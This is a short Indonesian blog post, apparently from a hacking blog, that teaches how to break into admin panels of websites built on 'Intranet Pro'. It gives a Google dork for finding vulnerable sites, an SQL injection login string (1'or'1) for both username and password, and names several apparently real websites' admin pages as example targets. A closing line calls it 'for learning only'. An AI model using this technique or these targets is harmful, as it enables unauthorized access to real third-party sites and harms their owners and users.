BYPASS INTRANET PRO (TUTORIAL HACK )


Selamat pagi.
Ini adalah posting ke 10  saya di status-hamba tentang hack
Kali ini saya ingin share, cara bypass intranet pro.
Caranya cukup sederhana.

Alat :
1. Browser Masing - Masing.
2. Sedikit pengetahuan tentang dork google.

Sebelumnya thanks to [Microsoft-Dz]
yang udah berbaik hati mau share cara ini
How To :
1.   Buka Google di browser masing - masing.
2.   Ketik teks dibawah ini untuk dork : intext:Service proposé par Intranet-Pro.com

3.   Cari website yang benar2 rentan akan adminnya...
Contoh disini, saya menemukan bug di: www.xxx.fr/admin/

4.  Login dengan :
Login: 1'or'1
Password: 1'or'1
seperti ini hasilnya :





Untuk contoh websitenya :
genetic-distribution.com/admin/
www.portail-plus.fr/js/admin/
http://www.tvhdm.com/admin/ 




NOTE : cara ini hanya untuk pembelajaran, jangan disalahgunakan.
thanks :)



Terimakasih sudah mampir ke blog saya dan saya ucapkan salam ( status-hamba ) 

Share on Google Plus

About Unknown

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

1 comments: